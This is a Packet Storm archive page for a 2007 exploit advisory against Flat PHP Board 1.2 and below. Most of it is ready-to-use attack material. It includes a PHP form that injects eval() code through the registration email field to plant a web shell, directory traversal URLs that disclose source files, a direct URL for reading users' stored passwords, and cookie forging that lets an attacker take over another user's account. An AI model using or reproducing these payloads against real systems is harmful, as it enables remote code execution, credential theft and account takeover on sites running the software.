exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

flatphp-multi.txt

flatphp-multi.txt
Posted Dec 10, 2007
Authored by KiNgOfThEwOrLd | Site inj3ct-it.org

Flat PHP Board versions 1.2 and below suffer from privilege escalation, directory traversal, and other vulnerabilities.

tags | exploit, php, vulnerability
SHA-256 | 855b493a72ac861dd0fb66becb18bf3fca87ba4a698e4211a4fcb4ab0d0b412a

flatphp-multi.txt

Change Mirror Download
---------------------------------------------------------------
____ __________ __ ____ __
/_ | ____ |__\_____ \ _____/ |_ /_ |/ |_
| |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\
| | | \ | |/ \ \___| | /_____/ | || |
|___|___| /\__| /______ /\___ >__| |___||__|
\/\______| \/ \/
---------------------------------------------------------------

Http://www.inj3ct-it.org Staff[at]inj3ct-it[dot]org

---------------------------------------------------------------

Flat PHP Board <= 1.2 Multiple Vulnerabilities

---------------------------------------------------------------

#By KiNgOfThEwOrLd

---------------------------------------------------------------
Remote User Credentials Disclosure

PoC:

No much to say...an attacker can get his target's informations visiting http://
[target]/[flat_php_board_path]/users/[target_username].php

The informations will be showed in this way:

[username] [password] [email]
---------------------------------------------------------------
Multiple Remote Command Executions / File Uploading

PoC:

When we register a new account, flat php board make a file like /users/
[username].php
All the fields (Username, Password, Email) are not correctly filtred. Then, an
attacker can executes a malicious code on the vulnerable server.

Exploit:

<?
//Usage: 31337.php?targ=http://[target]/[flat_php_board_path]
$targ = $_GET['targ'];
echo '
<form action=index.php method=post>
<input type=hidden name="username" value="../31337">
<input type=hidden name=a value=register2>
<input name="password" type=hidden value="r0x">
<input name="password2" type=hidden value="r0x">
<input name="email" value="<?eval(html_entity_decode(stripslashes($_GET
[r0x])));?>">
<input type=submit value="Exploit!">
</form>';
/*
This will make a shell in http://[target]/[flat_php_board_path]/31337.php
Usage: http://[target]/[flat_php_board_path]/31337.php?r0x=[php_code]
*/
?>

Nb. also all the fields of index.php?a=profile is not correctly parsed.
---------------------------------------------------------------
Remote Directory Traversal / Source Disclosure

http://[target]/[flat_php_board_path]index.php?a=topic&topic=../[arbitrary php
file]

http://[target]/[flat_php_board_path]index.php?a=viewprofile&username=../
[arbitrary php file]
---------------------------------------------------------------
Remote Cookie Manipoulation / Privilege Escalation

PoC:

An attacker can login with an arbitrary account editing the fpb_username
cookie.

In fact, if you try to replace your username with your target username and
refresh, you will be logged in like him. But now, if you try to edit your
profile or something like that, you will generate an error like:

Error with cookies. password/username not correct.

Don't worry, if you go to index.php?a=profile you will find your victim
credentials. Then, viewing the source code you can view your victim password
as:

<td bgcolor=#f9f9f9><font face="verdana" size=2>Password:</font></td>
<td bgcolor=#f9f9f9><input name="password" type=password value="[password]"
> ></td>
---------------------------------------------------------------
Ok, i think that's all :S
---------------------------------------------------------------


Login or Register to add favorites

File Archive:

November 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    16 Files
  • 2
    Nov 2nd
    17 Files
  • 3
    Nov 3rd
    17 Files
  • 4
    Nov 4th
    11 Files
  • 5
    Nov 5th
    0 Files
  • 6
    Nov 6th
    0 Files
  • 7
    Nov 7th
    3 Files
  • 8
    Nov 8th
    59 Files
  • 9
    Nov 9th
    12 Files
  • 10
    Nov 10th
    6 Files
  • 11
    Nov 11th
    11 Files
  • 12
    Nov 12th
    1 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    9 Files
  • 15
    Nov 15th
    33 Files
  • 16
    Nov 16th
    53 Files
  • 17
    Nov 17th
    11 Files
  • 18
    Nov 18th
    14 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    26 Files
  • 22
    Nov 22nd
    22 Files
  • 23
    Nov 23rd
    10 Files
  • 24
    Nov 24th
    9 Files
  • 25
    Nov 25th
    11 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close